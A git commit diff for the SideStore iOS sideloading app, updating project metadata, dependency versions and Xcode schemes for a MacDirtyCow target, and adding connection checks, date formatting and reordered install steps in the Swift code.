bugfix(MDC): fix minor overlooks

Signed-off-by: June Park <rjp2030@outlook.com>

.github/CODEOWNERS

@@ -1 +1 @@
-*       @JoeMatt @lonkelle
+*       @JoeMatt @lonkelle @nythepegasus @Spidy123222 @SternXD

.github/ISSUE_TEMPLATE/bug_report.yml

@@ -10,7 +10,7 @@ body:
       value: |
         Thanks for taking the time to fill out this bug report! Before you continue filling out the report, please **[search in GitHub Issues](https://github.com/SideStore/SideStore/issues?q=is%3Aissue+is%3Aopen) for the bug you are experiencing** in case it has already been reported.
         
-        **Please use [Discord](https://discord.gg/RgpFBX3Q3k) or [GitHub Discussions](https://github.com/SideStore/SideStore/discussions) for support.**
+        **Please use [Discord](https://discord.gg/sidestore-949183273383395328) or [GitHub Discussions](https://github.com/SideStore/SideStore/discussions) for support.**
   - type: textarea
     id: description
     attributes:

.github/ISSUE_TEMPLATE/config.yml

@@ -3,7 +3,7 @@ blank_issues_enabled: false
 
 contact_links:
   - name: Discord
-    url: https://discord.gg/RgpFBX3Q3k
+    url: https://discord.gg/sidestore-949183273383395328
     about: If you need support, please go here first instead of making an issue!
   - name: GitHub Discussions
     url: https://github.com/SideStore/SideStore/discussions

.github/ISSUE_TEMPLATE/feature_request.yml

@@ -10,7 +10,7 @@ body:
       value: |
         Thanks for taking the time to fill out this feature request! Before you continue filling out the form, please **[search in GitHub Issues](https://github.com/SideStore/SideStore/issues?q=is%3Aissue+is%3Aopen) for the feature you are suggestion** in case it has already been suggested.
         
-        **Please use [Discord](https://discord.gg/RgpFBX3Q3k) or [GitHub Discussions](https://github.com/SideStore/SideStore/discussions) for support.**
+        **Please use [Discord](https://discord.gg/sidestore-949183273383395328) or [GitHub Discussions](https://github.com/SideStore/SideStore/discussions) for support.**
   - type: textarea
     id: description
     attributes:

.github/workflows/stable.yml

@@ -3,6 +3,7 @@ on:
   push:
     tags:
       - '[0-9]+.[0-9]+.[0-9]+' # example: 1.0.0
+  workflow_dispatch:
 
 jobs:
   build:

.gitmodules

@@ -9,7 +9,7 @@
 	url = https://github.com/libimobiledevice/libusbmuxd.git
 [submodule "Dependencies/libplist"]
 	path = Dependencies/libplist
-	url = https://github.com/libimobiledevice/libplist.git
+	url = https://github.com/SideStore/libplist.git
 [submodule "Dependencies/MarkdownAttributedString"]
 	path = Dependencies/MarkdownAttributedString
 	url = https://github.com/chockenberry/MarkdownAttributedString.git

AltBackup/Assets.xcassets/Background.colorset/Contents.json

@@ -5,9 +5,9 @@
         "color-space" : "srgb",
         "components" : {
           "alpha" : "1.000",
-          "blue" : "0.518",
+          "blue" : "175",
-          "green" : "0.502",
+          "green" : "4",
-          "red" : "0.004"
+          "red" : "115"
         }
       },
       "idiom" : "universal"
@@ -23,9 +23,9 @@
         "color-space" : "srgb",
         "components" : {
           "alpha" : "1.000",
-          "blue" : "0.404",
+          "blue" : "150",
-          "green" : "0.322",
+          "green" : "3",
-          "red" : "0.008"
+          "red" : "99"
         }
       },
       "idiom" : "universal"

AltStore.xcodeproj/project.xcworkspace/xcshareddata/swiftpm/Package.resolved

@@ -6,7 +6,7 @@
       "location" : "https://github.com/SideStore/AltSign",
       "state" : {
         "branch" : "master",
-        "revision" : "7e0e7edcf8fbc44ac1e35da3e9030a297aa18b84"
+        "revision" : "cc6189f0f7cd8e5bd24943af9322e0ff9420e9f4"
       }
     },
     {
@@ -14,8 +14,17 @@
       "kind" : "remoteSourceControl",
       "location" : "https://github.com/microsoft/appcenter-sdk-apple.git",
       "state" : {
-        "revision" : "8354a50fe01a7e54e196d3b5493b5ab53dd5866a",
+        "revision" : "b2dc99cfedead0bad4e6573d86c5228c89cff332",
-        "version" : "4.4.2"
+        "version" : "4.4.3"
+      }
+    },
+    {
+      "identity" : "imobiledevice.swift",
+      "kind" : "remoteSourceControl",
+      "location" : "https://github.com/SideStore/iMobileDevice.swift",
+      "state" : {
+        "revision" : "74e481106dd155c0cd21bca6795fd9fe5f751654",
+        "version" : "1.0.5"
       }
     },
     {
@@ -50,8 +59,8 @@
       "kind" : "remoteSourceControl",
       "location" : "https://github.com/krzyzanowskim/OpenSSL",
       "state" : {
-        "revision" : "033fcb41dac96b1b6effa945ca1f9ade002370b2",
+        "revision" : "0faf71a188bcfdf0245cab42886b9b240ca71c52",
-        "version" : "1.1.1501"
+        "version" : "1.1.2200"
       }
     },
     {
@@ -59,8 +68,8 @@
       "kind" : "remoteSourceControl",
       "location" : "https://github.com/microsoft/PLCrashReporter.git",
       "state" : {
-        "revision" : "6b27393cad517c067dceea85fadf050e70c4ceaa",
+        "revision" : "81cdec2b3827feb03286cb297f4c501a8eb98df1",
-        "version" : "1.10.1"
+        "version" : "1.10.2"
       }
     },
     {
@@ -68,8 +77,8 @@
       "kind" : "remoteSourceControl",
       "location" : "https://github.com/SwiftPackageIndex/SemanticVersion.git",
       "state" : {
-        "revision" : "fc670910dc0903cc269b3d0b776cda5703979c4e",
+        "revision" : "a70840d5fca686ae3bd2fcf8aecc5ded0bd4f125",
-        "version" : "0.3.5"
+        "version" : "0.3.6"
       }
     },
     {
@@ -77,8 +86,8 @@
       "kind" : "remoteSourceControl",
       "location" : "https://github.com/sparkle-project/Sparkle.git",
       "state" : {
-        "revision" : "286edd1fa22505a9e54d170e9fd07d775ea233f2",
+        "revision" : "f0ceaf5cc9f3f23daa0ccb6dcebd79fc96ccc7d9",
-        "version" : "2.1.0"
+        "version" : "2.5.0"
       }
     },
     {
@@ -86,8 +95,8 @@
       "kind" : "remoteSourceControl",
       "location" : "https://github.com/daltoniam/Starscream.git",
       "state" : {
-        "revision" : "df8d82047f6654d8e4b655d1b1525c64e1059d21",
+        "revision" : "ac6c0fc9da221873e01bd1a0d4818498a71eef33",
-        "version" : "4.0.4"
+        "version" : "4.0.6"
       }
     },
     {

AltStore.xcodeproj/xcshareddata/xcschemes/MacDirtyCow.xcscheme

@@ -0,0 +1,67 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<Scheme
+   LastUpgradeVersion = "1420"
+   version = "1.3">
+   <BuildAction
+      parallelizeBuildables = "YES"
+      buildImplicitDependencies = "YES">
+      <BuildActionEntries>
+         <BuildActionEntry
+            buildForTesting = "YES"
+            buildForRunning = "YES"
+            buildForProfiling = "YES"
+            buildForArchiving = "YES"
+            buildForAnalyzing = "YES">
+            <BuildableReference
+               BuildableIdentifier = "primary"
+               BlueprintIdentifier = "BDE94B3D2B15EEDA00B506A1"
+               BuildableName = "MacDirtyCow.framework"
+               BlueprintName = "MacDirtyCow"
+               ReferencedContainer = "container:AltStore.xcodeproj">
+            </BuildableReference>
+         </BuildActionEntry>
+      </BuildActionEntries>
+   </BuildAction>
+   <TestAction
+      buildConfiguration = "Debug"
+      selectedDebuggerIdentifier = "Xcode.DebuggerFoundation.Debugger.LLDB"
+      selectedLauncherIdentifier = "Xcode.DebuggerFoundation.Launcher.LLDB"
+      shouldUseLaunchSchemeArgsEnv = "YES">
+      <Testables>
+      </Testables>
+   </TestAction>
+   <LaunchAction
+      buildConfiguration = "Debug"
+      selectedDebuggerIdentifier = "Xcode.DebuggerFoundation.Debugger.LLDB"
+      selectedLauncherIdentifier = "Xcode.DebuggerFoundation.Launcher.LLDB"
+      launchStyle = "0"
+      useCustomWorkingDirectory = "NO"
+      ignoresPersistentStateOnLaunch = "NO"
+      debugDocumentVersioning = "YES"
+      debugServiceExtension = "internal"
+      allowLocationSimulation = "YES">
+   </LaunchAction>
+   <ProfileAction
+      buildConfiguration = "Release"
+      shouldUseLaunchSchemeArgsEnv = "YES"
+      savedToolIdentifier = ""
+      useCustomWorkingDirectory = "NO"
+      debugDocumentVersioning = "YES">
+      <MacroExpansion>
+         <BuildableReference
+            BuildableIdentifier = "primary"
+            BlueprintIdentifier = "BDE94B3D2B15EEDA00B506A1"
+            BuildableName = "MacDirtyCow.framework"
+            BlueprintName = "MacDirtyCow"
+            ReferencedContainer = "container:AltStore.xcodeproj">
+         </BuildableReference>
+      </MacroExpansion>
+   </ProfileAction>
+   <AnalyzeAction
+      buildConfiguration = "Debug">
+   </AnalyzeAction>
+   <ArchiveAction
+      buildConfiguration = "Release"
+      revealArchiveInOrganizer = "YES">
+   </ArchiveAction>
+</Scheme>

AltStore.xcodeproj/xcshareddata/xcschemes/SideStore MacDirtyCow.xcscheme

@@ -0,0 +1,78 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<Scheme
+   LastUpgradeVersion = "1420"
+   version = "1.3">
+   <BuildAction
+      parallelizeBuildables = "YES"
+      buildImplicitDependencies = "YES">
+      <BuildActionEntries>
+         <BuildActionEntry
+            buildForTesting = "YES"
+            buildForRunning = "YES"
+            buildForProfiling = "YES"
+            buildForArchiving = "YES"
+            buildForAnalyzing = "YES">
+            <BuildableReference
+               BuildableIdentifier = "primary"
+               BlueprintIdentifier = "BDE94A972B15E4D300B506A1"
+               BuildableName = "SideStore MacDirtyCow.app"
+               BlueprintName = "SideStore MacDirtyCow"
+               ReferencedContainer = "container:AltStore.xcodeproj">
+            </BuildableReference>
+         </BuildActionEntry>
+      </BuildActionEntries>
+   </BuildAction>
+   <TestAction
+      buildConfiguration = "Debug"
+      selectedDebuggerIdentifier = "Xcode.DebuggerFoundation.Debugger.LLDB"
+      selectedLauncherIdentifier = "Xcode.DebuggerFoundation.Launcher.LLDB"
+      shouldUseLaunchSchemeArgsEnv = "YES">
+      <Testables>
+      </Testables>
+   </TestAction>
+   <LaunchAction
+      buildConfiguration = "Debug"
+      selectedDebuggerIdentifier = "Xcode.DebuggerFoundation.Debugger.LLDB"
+      selectedLauncherIdentifier = "Xcode.DebuggerFoundation.Launcher.LLDB"
+      launchStyle = "0"
+      useCustomWorkingDirectory = "NO"
+      ignoresPersistentStateOnLaunch = "NO"
+      debugDocumentVersioning = "YES"
+      debugServiceExtension = "internal"
+      allowLocationSimulation = "YES">
+      <BuildableProductRunnable
+         runnableDebuggingMode = "0">
+         <BuildableReference
+            BuildableIdentifier = "primary"
+            BlueprintIdentifier = "BDE94A972B15E4D300B506A1"
+            BuildableName = "SideStore MacDirtyCow.app"
+            BlueprintName = "SideStore MacDirtyCow"
+            ReferencedContainer = "container:AltStore.xcodeproj">
+         </BuildableReference>
+      </BuildableProductRunnable>
+   </LaunchAction>
+   <ProfileAction
+      buildConfiguration = "Release"
+      shouldUseLaunchSchemeArgsEnv = "YES"
+      savedToolIdentifier = ""
+      useCustomWorkingDirectory = "NO"
+      debugDocumentVersioning = "YES">
+      <BuildableProductRunnable
+         runnableDebuggingMode = "0">
+         <BuildableReference
+            BuildableIdentifier = "primary"
+            BlueprintIdentifier = "BDE94A972B15E4D300B506A1"
+            BuildableName = "SideStore MacDirtyCow.app"
+            BlueprintName = "SideStore MacDirtyCow"
+            ReferencedContainer = "container:AltStore.xcodeproj">
+         </BuildableReference>
+      </BuildableProductRunnable>
+   </ProfileAction>
+   <AnalyzeAction
+      buildConfiguration = "Debug">
+   </AnalyzeAction>
+   <ArchiveAction
+      buildConfiguration = "Release"
+      revealArchiveInOrganizer = "YES">
+   </ArchiveAction>
+</Scheme>

AltStore/App Detail/AppViewController.swift

@@ -217,8 +217,8 @@ final class AppViewController: UIViewController
                         
             self._shouldResetLayout = false
         }
-        
+                
-        let statusBarHeight = UIApplication.shared.statusBarFrame.height
+        let statusBarHeight = self.view.window?.windowScene?.statusBarManager?.statusBarFrame.height ?? 0
         let cornerRadius = self.contentViewControllerShadowView.layer.cornerRadius
         
         let inset = 12 as CGFloat
@@ -323,7 +323,7 @@ final class AppViewController: UIViewController
         
         self.backButtonContainerView.layer.cornerRadius = self.backButtonContainerView.bounds.midY
         
-        self.scrollView.scrollIndicatorInsets.top = statusBarHeight
+        self.scrollView.verticalScrollIndicatorInsets.top = statusBarHeight
         
         // Adjust content offset + size.
         let contentOffset = self.scrollView.contentOffset

AltStore/App IDs/AppIDsViewController.swift

@@ -90,14 +90,21 @@ private extension AppIDsViewController
                 cell.bannerView.button.isUserInteractionEnabled = false
                 
                 cell.bannerView.buttonLabel.isHidden = false
-                
+
                 let currentDate = Date()
                 
-                let numberOfDays = expirationDate.numberOfCalendarDays(since: currentDate)
+                let formatter = DateComponentsFormatter()
-                let numberOfDaysText = (numberOfDays == 1) ? NSLocalizedString("1 day", comment: "") : String(format: NSLocalizedString("%@ days", comment: ""), NSNumber(value: numberOfDays))
+                formatter.unitsStyle = .full
-                cell.bannerView.button.setTitle(numberOfDaysText.uppercased(), for: .normal)
+                formatter.includesApproximationPhrase = false
+                formatter.includesTimeRemainingPhrase = false
+                formatter.allowedUnits = [.minute, .hour, .day]
+                formatter.maximumUnitCount = 1
                 
-                attributedAccessibilityLabel.mutableString.append(String(format: NSLocalizedString("Expires in %@.", comment: ""), numberOfDaysText) + " ")
+                cell.bannerView.button.setTitle((formatter.string(from: currentDate, to: expirationDate) ?? NSLocalizedString("Unknown", comment: "")).uppercased(), for: .normal)
+                
+                // formatter.includesTimeRemainingPhrase = true
+                
+                // attributedAccessibilityLabel.mutableString.append((formatter.string(from: currentDate, to: expirationDate) ?? NSLocalizedString("Unknown", comment: "")) + " ")
             }
             else
             {

AltStore/Browse/BrowseViewController.swift

@@ -8,6 +8,7 @@
 
 import UIKit
 
+import minimuxer
 import AltStoreCore
 import Roxas
 
@@ -264,7 +265,13 @@ private extension BrowseViewController
             previousProgress?.cancel()
             return
         }
-        
+
+        if !minimuxer.ready() {
+            let toastView = ToastView(error: MinimuxerError.NoConnection)
+            toastView.show(in: self)
+            return
+        }
+
         _ = AppManager.shared.install(app, presentingViewController: self) { (result) in
             DispatchQueue.main.async {
                 switch result

AltStore/Components/CollapsingTextView.swift

@@ -22,7 +22,7 @@ final class CollapsingTextView: UITextView
         }
     }
     
-    var lineSpacing: CGFloat = 2 {
+    var lineSpacing: Double = 2 {
         didSet {
             self.setNeedsLayout()
         }
@@ -34,7 +34,19 @@ final class CollapsingTextView: UITextView
     {
         super.awakeFromNib()
         
-        self.layoutManager.delegate = self
+        self.initialize()
+    }
+    
+    private func initialize()
+    {
+        if #available(iOS 16, *)
+        {
+            self.updateText()
+        }
+        else
+        {
+            self.layoutManager.delegate = self
+        }
         
         self.textContainerInset = .zero
         self.textContainer.lineFragmentPadding = 0
@@ -108,6 +120,25 @@ private extension CollapsingTextView
     {
         self.isCollapsed.toggle()
     }
+    
+    @available(iOS 16, *)
+    func updateText()
+    {
+        do
+        {
+            let style = NSMutableParagraphStyle()
+            style.lineSpacing = self.lineSpacing
+            
+            var attributedText = try AttributedString(self.attributedText, including: \.uiKit)
+            attributedText[AttributeScopes.UIKitAttributes.ParagraphStyleAttribute.self] = style
+            
+            self.attributedText = NSAttributedString(attributedText)
+        }
+        catch
+        {
+            print("[ALTLog] Failed to update CollapsingTextView line spacing:", error)
+        }
+    }
 }
 
 extension CollapsingTextView: NSLayoutManagerDelegate

AltStore/Components/PillButton.swift

@@ -8,6 +8,12 @@
 
 import UIKit
 
+extension PillButton
+{
+    static let minimumSize = CGSize(width: 77, height: 31)
+    static let contentInsets = NSDirectionalEdgeInsets(top: 7, leading: 13, bottom: 7, trailing: 13)
+}
+
 final class PillButton: UIButton
 {
     override var accessibilityValue: String? {
@@ -70,9 +76,7 @@ final class PillButton: UIButton
     }()
     
     override var intrinsicContentSize: CGSize {
-        var size = super.intrinsicContentSize
+        let size = self.sizeThatFits(CGSize(width: Double.infinity, height: .infinity))
-        size.width += 26
-        size.height += 3
         return size
     }
     
@@ -88,6 +92,8 @@ final class PillButton: UIButton
         self.layer.masksToBounds = true
         self.accessibilityTraits.formUnion([.updatesFrequently, .button])
         
+        self.contentEdgeInsets = UIEdgeInsets(top: Self.contentInsets.top, left: Self.contentInsets.leading, bottom: Self.contentInsets.bottom, right: Self.contentInsets.trailing)
+        
         self.activityIndicatorView.style = .medium
         self.activityIndicatorView.isUserInteractionEnabled = false
         
@@ -119,6 +125,15 @@ final class PillButton: UIButton
         
         self.update()
     }
+    
+    override func sizeThatFits(_ size: CGSize) -> CGSize
+    {
+        var size = super.sizeThatFits(size)
+        size.width = max(size.width, PillButton.minimumSize.width)
+        size.height = max(size.height, PillButton.minimumSize.height)
+        
+        return size
+    }
 }
 
 private extension PillButton

AltStore/Info.plist

@@ -14,7 +14,7 @@
 	<key>ALTPairingFile</key>
 	<string>&lt;insert pairing file here&gt;</string>
 	<key>ALTAnisetteURL</key>
-	<string>http://ani.sidestore.io:6969</string>
+	<string>https://ani.sidestore.io</string>
 	<key>CFBundleDevelopmentRegion</key>
 	<string>$(DEVELOPMENT_LANGUAGE)</string>
 	<key>CFBundleDocumentTypes</key>

AltStore/LaunchViewController.swift

@@ -81,7 +81,7 @@ final class LaunchViewController: RSTLaunchViewController, UIDocumentPickerDeleg
         } else {
             // Show an alert explaining the pairing file
             // Create new Alert
-            let dialogMessage = UIAlertController(title: "Pairing File", message: "Select the pairing file for your device. For more information, go to https://wiki.sidestore.io/guides/install#pairing-process", preferredStyle: .alert)
+            let dialogMessage = UIAlertController(title: "Pairing File", message: "Select the pairing file for your device. For more information, go to https://wiki.sidestore.io/guides/getting-started/#pairing-file", preferredStyle: .alert)
             
             // Create OK button with action handler
             let ok = UIAlertAction(title: "OK", style: .default, handler: { (action) -> Void in
@@ -155,7 +155,12 @@ final class LaunchViewController: RSTLaunchViewController, UIDocumentPickerDeleg
             try! FileManager.default.removeItem(at: FileManager.default.documentsDirectory.appendingPathComponent("\(pairingFileName)"))
             displayError("minimuxer failed to start, please restart SideStore. \((error as? LocalizedError)?.failureReason ?? "UNKNOWN ERROR!!!!!! REPORT TO GITHUB ISSUES!")")
         }
-        start_auto_mounter(documentsDirectory)
+        if #available(iOS 17, *) {
+            // TODO: iOS 17 and above have a new JIT implementation that is completely broken in SideStore :(
+        }
+        else {
+            start_auto_mounter(documentsDirectory)
+        }
     }
 }
 

AltStore/Managing Apps/AppManager.swift

@@ -307,6 +307,16 @@ extension AppManager
             presentingViewController.present(alertController, animated: true, completion: nil)
         }
     }
+    
+    func clearAppCache(completion: @escaping (Result<Void, Error>) -> Void)
+    {
+        let clearAppCacheOperation = ClearAppCacheOperation()
+        clearAppCacheOperation.resultHandler = { result in
+            completion(result)
+        }
+        
+        self.run([clearAppCacheOperation], context: nil)
+    }
 }
 
 extension AppManager
@@ -754,6 +764,12 @@ extension AppManager
         let progress = self.refreshProgress[app.bundleIdentifier]
         return progress
     }
+    
+    func isActivelyManagingApp(withBundleID bundleID: String) -> Bool
+    {
+        let isActivelyManaging = self.installationProgress.keys.contains(bundleID) || self.refreshProgress.keys.contains(bundleID)
+        return isActivelyManaging
+    }
 }
 
 extension AppManager
@@ -808,12 +824,6 @@ private extension AppManager
         }
     }
     
-    func isActivelyManagingApp(withBundleID bundleID: String) -> Bool
-    {
-        let isActivelyManaging = self.installationProgress.keys.contains(bundleID) || self.refreshProgress.keys.contains(bundleID)
-        return isActivelyManaging
-    }
-    
     @discardableResult
     private func perform(_ operations: [AppOperation], presentingViewController: UIViewController?, group: RefreshGroup) -> RefreshGroup
     {
@@ -948,7 +958,13 @@ private extension AppManager
         }
         else
         {
+            DispatchQueue.main.schedule {
+                UIApplication.shared.isIdleTimerDisabled = UserDefaults.standard.isIdleTimeoutDisableEnabled
+            }
             performAppOperations()
+            DispatchQueue.main.schedule {
+                UIApplication.shared.isIdleTimerDisabled = false
+            }
         }
         
         return group
@@ -1027,6 +1043,32 @@ private extension AppManager
         verifyOperation.addDependency(downloadOperation)
         
         
+        /* Refresh Anisette Data */
+        let refreshAnisetteDataOperation = FetchAnisetteDataOperation(context: group.context)
+        refreshAnisetteDataOperation.resultHandler = { (result) in
+            switch result
+            {
+            case .failure(let error): context.error = error
+            case .success(let anisetteData): group.context.session?.anisetteData = anisetteData
+            }
+        }
+        refreshAnisetteDataOperation.addDependency(verifyOperation)
+
+
+        /* Fetch Provisioning Profiles */
+        let fetchProvisioningProfilesOperation = FetchProvisioningProfilesOperation(context: context)
+        fetchProvisioningProfilesOperation.additionalEntitlements = additionalEntitlements
+        fetchProvisioningProfilesOperation.resultHandler = { (result) in
+            switch result
+            {
+            case .failure(let error): context.error = error
+            case .success(let provisioningProfiles): context.provisioningProfiles = provisioningProfiles
+            }
+        }
+        fetchProvisioningProfilesOperation.addDependency(refreshAnisetteDataOperation)
+        progress.addChild(fetchProvisioningProfilesOperation.progress, withPendingUnitCount: 5)
+
+
         /* Deactivate Apps (if necessary) */
         let deactivateAppsOperation = RSTAsyncBlockOperation { [weak self] (operation) in
             do
@@ -1042,6 +1084,12 @@ private extension AppManager
                 {
                     throw error
                 }
+                
+                guard let profiles = context.provisioningProfiles else { throw OperationError.invalidParameters }
+                if !profiles.contains(where: { $1.isFreeProvisioningProfile == true }) {
+                    operation.finish()
+                    return
+                }
                                 
                 guard let app = context.app, let presentingViewController = context.authenticatedContext.presentingViewController else { throw OperationError.invalidParameters }
                 
@@ -1061,7 +1109,7 @@ private extension AppManager
                 operation.finish()
             }
         }
-        deactivateAppsOperation.addDependency(verifyOperation)
+        deactivateAppsOperation.addDependency(fetchProvisioningProfilesOperation)
         
         
         /* Patch App */
@@ -1136,32 +1184,6 @@ private extension AppManager
         patchAppOperation.addDependency(deactivateAppsOperation)
         
         
-        /* Refresh Anisette Data */
-        let refreshAnisetteDataOperation = FetchAnisetteDataOperation(context: group.context)
-        refreshAnisetteDataOperation.resultHandler = { (result) in
-            switch result
-            {
-            case .failure(let error): context.error = error
-            case .success(let anisetteData): group.context.session?.anisetteData = anisetteData
-            }
-        }
-        refreshAnisetteDataOperation.addDependency(patchAppOperation)
-        
-        
-        /* Fetch Provisioning Profiles */
-        let fetchProvisioningProfilesOperation = FetchProvisioningProfilesOperation(context: context)
-        fetchProvisioningProfilesOperation.additionalEntitlements = additionalEntitlements
-        fetchProvisioningProfilesOperation.resultHandler = { (result) in
-            switch result
-            {
-            case .failure(let error): context.error = error
-            case .success(let provisioningProfiles): context.provisioningProfiles = provisioningProfiles
-            }
-        }
-        fetchProvisioningProfilesOperation.addDependency(refreshAnisetteDataOperation)
-        progress.addChild(fetchProvisioningProfilesOperation.progress, withPendingUnitCount: 5)
-        
-        
         /* Resign */
         let resignAppOperation = ResignAppOperation(context: context)
         resignAppOperation.resultHandler = { (result) in
@@ -1171,7 +1193,7 @@ private extension AppManager
             case .success(let resignedApp): context.resignedApp = resignedApp
             }
         }
-        resignAppOperation.addDependency(fetchProvisioningProfilesOperation)
+        resignAppOperation.addDependency(patchAppOperation)
         progress.addChild(resignAppOperation.progress, withPendingUnitCount: 20)
         
         
@@ -1214,7 +1236,7 @@ private extension AppManager
         progress.addChild(installOperation.progress, withPendingUnitCount: 30)
         installOperation.addDependency(sendAppOperation)
         
-        let operations = [downloadOperation, verifyOperation, deactivateAppsOperation, patchAppOperation, refreshAnisetteDataOperation, fetchProvisioningProfilesOperation, resignAppOperation, sendAppOperation, installOperation]
+        let operations = [downloadOperation, verifyOperation, refreshAnisetteDataOperation, fetchProvisioningProfilesOperation, deactivateAppsOperation, patchAppOperation, resignAppOperation, sendAppOperation, installOperation]
         group.add(operations)
         self.run(operations, context: group.context)
         

AltStore/My Apps/MyAppsViewController.swift

@@ -10,10 +10,12 @@ import UIKit
 import MobileCoreServices
 import Intents
 import Combine
+import UniformTypeIdentifiers
 
 import AltStoreCore
 import AltSign
 import Roxas
+import minimuxer
 
 import Nuke
 
@@ -327,21 +329,25 @@ private extension MyAppsViewController
             let currentDate = Date()
             
             let numberOfDays = installedApp.expirationDate.numberOfCalendarDays(since: currentDate)
-            let numberOfDaysText: String
             
-            if numberOfDays == 1
+            let formatter = DateComponentsFormatter()
-            {
+            formatter.unitsStyle = .full
-                numberOfDaysText = NSLocalizedString("1 day", comment: "")
+            formatter.includesApproximationPhrase = false
-            }
+            formatter.includesTimeRemainingPhrase = false
-            else
+            
-            {
+            formatter.allowedUnits = [.day, .hour, .minute]
-                numberOfDaysText = String(format: NSLocalizedString("%@ days", comment: ""), NSNumber(value: numberOfDays))
+            
-            }
+            formatter.maximumUnitCount = 1
+            
+            
+            
+            cell.bannerView.button.setTitle(formatter.string(from: currentDate, to: installedApp.expirationDate)?.uppercased(), for: .normal)
             
-            cell.bannerView.button.setTitle(numberOfDaysText.uppercased(), for: .normal)
             cell.bannerView.button.accessibilityLabel = String(format: NSLocalizedString("Refresh %@", comment: ""), installedApp.name)
-            
+
-            cell.bannerView.accessibilityLabel? += ". " + String(format: NSLocalizedString("Expires in %@", comment: ""), numberOfDaysText)
+            formatter.includesTimeRemainingPhrase = true
+
+            cell.bannerView.accessibilityLabel? += ". " + (formatter.string(from: currentDate, to: installedApp.expirationDate) ?? NSLocalizedString("Unknown", comment: "")) + " "
             
             // Make sure refresh button is correct size.
             cell.layoutIfNeeded()
@@ -639,6 +645,12 @@ private extension MyAppsViewController
     
     @IBAction func refreshAllApps(_ sender: UIBarButtonItem)
     {
+        if !minimuxer.ready() {
+            let toastView = ToastView(error: MinimuxerError.NoConnection)
+            toastView.show(in: self)
+            return
+        }
+
         self.isRefreshingAllApps = true
         self.collectionView.collectionViewLayout.invalidateLayout()
 
@@ -701,18 +713,15 @@ private extension MyAppsViewController
     
     @IBAction func sideloadApp(_ sender: UIBarButtonItem)
     {
-        let supportedTypes: [String]
+        if !minimuxer.ready() {
-        
+            let toastView = ToastView(error: MinimuxerError.NoConnection)
-        if let types = UTTypeCreateAllIdentifiersForTag(kUTTagClassFilenameExtension, "ipa" as CFString, nil)?.takeRetainedValue()
+            toastView.show(in: self)
-        {
+            return
-            supportedTypes = (types as NSArray).map { $0 as! String }
-        }
-        else
-        {
-            supportedTypes = ["com.apple.itunes.ipa"] // Declared by the system.
         }
+
+        let supportedTypes = UTType.types(tag: "ipa", tagClass: .filenameExtension, conformingTo: nil)
         
-        let documentPickerViewController = UIDocumentPickerViewController(documentTypes: supportedTypes, in: .import)
+        let documentPickerViewController = UIDocumentPickerViewController(forOpeningContentTypes: supportedTypes, asCopy: true)
         documentPickerViewController.delegate = self
         self.present(documentPickerViewController, animated: true, completion: nil)
     }
@@ -1014,6 +1023,12 @@ private extension MyAppsViewController
     
     func refresh(_ installedApp: InstalledApp)
     {
+        if !minimuxer.ready() {
+            let toastView = ToastView(error: MinimuxerError.NoConnection)
+            toastView.show(in: self)
+            return
+        }
+
         let previousProgress = AppManager.shared.refreshProgress(for: installedApp)
         guard previousProgress == nil else {
             previousProgress?.cancel()
@@ -1035,6 +1050,12 @@ private extension MyAppsViewController
     
     func activate(_ installedApp: InstalledApp)
     {
+        if !minimuxer.ready() {
+            let toastView = ToastView(error: MinimuxerError.NoConnection)
+            toastView.show(in: self)
+            return
+        }
+
         func finish(_ result: Result<InstalledApp, Error>)
         {
             do
@@ -1111,6 +1132,11 @@ private extension MyAppsViewController
     func deactivate(_ installedApp: InstalledApp, completionHandler: ((Result<InstalledApp, Error>) -> Void)? = nil)
     {
         guard installedApp.isActive else { return }
+        if !minimuxer.ready() {
+            let toastView = ToastView(error: MinimuxerError.NoConnection)
+            toastView.show(in: self)
+            return
+        }
         installedApp.isActive = false
         
         AppManager.shared.deactivate(installedApp, presentingViewController: self) { (result) in
@@ -1172,6 +1198,11 @@ private extension MyAppsViewController
     
     func backup(_ installedApp: InstalledApp)
     {
+        if !minimuxer.ready() {
+            let toastView = ToastView(error: MinimuxerError.NoConnection)
+            toastView.show(in: self)
+            return
+        }
         let title = NSLocalizedString("Start Backup?", comment: "")
         let message = NSLocalizedString("This will replace any previous backups. Please leave SideStore open until the backup is complete.", comment: "")
 
@@ -1211,6 +1242,11 @@ private extension MyAppsViewController
     
     func restore(_ installedApp: InstalledApp)
     {
+        if !minimuxer.ready() {
+            let toastView = ToastView(error: MinimuxerError.NoConnection)
+            toastView.show(in: self)
+            return
+        }
         let message = String(format: NSLocalizedString("This will replace all data you currently have in %@.", comment: ""), installedApp.name)
         let alertController = UIAlertController(title: NSLocalizedString("Are you sure you want to restore this backup?", comment: ""), message: message, preferredStyle: .actionSheet)
         alertController.addAction(.cancel)
@@ -1246,8 +1282,11 @@ private extension MyAppsViewController
     {
         guard let backupURL = FileManager.default.backupDirectoryURL(for: installedApp) else { return }
         
-        let documentPicker = UIDocumentPickerViewController(url: backupURL, in: .exportToService)
+        let documentPicker = UIDocumentPickerViewController(forExporting: [backupURL], asCopy: true)
-        documentPicker.delegate = self
+        
+        // Don't set delegate to avoid conflicting with import callbacks.
+        // documentPicker.delegate = self
+        
         self.present(documentPicker, animated: true, completion: nil)
     }
     
@@ -1311,6 +1350,16 @@ private extension MyAppsViewController
     @available(iOS 14, *)
     func enableJIT(for installedApp: InstalledApp)
     {
+        if #available(iOS 17, *) {
+            let toastView = ToastView(error: OperationError.tooNewError)
+            toastView.show(in: self)
+            return
+        }
+        if !minimuxer.ready() {
+            let toastView = ToastView(error: MinimuxerError.NoConnection)
+            toastView.show(in: self)
+            return
+        }
         AppManager.shared.enableJIT(for: installedApp) { result in
             DispatchQueue.main.async {
                 switch result
@@ -1318,7 +1367,7 @@ private extension MyAppsViewController
                 case .success: break
                 case .failure(let error):
                     let toastView = ToastView(error: error)
-                    toastView.show(in: self)
+                    toastView.show(in: self.navigationController?.view ?? self.view, duration: 5)
                 }
             }
         }
@@ -1465,7 +1514,7 @@ extension MyAppsViewController
                 let registeredAppIDs = team.appIDs.count
                 
                 let maximumAppIDCount = 10
-                let remainingAppIDs = max(maximumAppIDCount - registeredAppIDs, 0)
+                let remainingAppIDs = maximumAppIDCount - registeredAppIDs
                 
                 if remainingAppIDs == 1
                 {
@@ -1476,7 +1525,7 @@ extension MyAppsViewController
                     footerView.textLabel.text = String(format: NSLocalizedString("%@ App IDs Remaining", comment: ""), NSNumber(value: remainingAppIDs))
                 }
                 
-                footerView.textLabel.isHidden = false
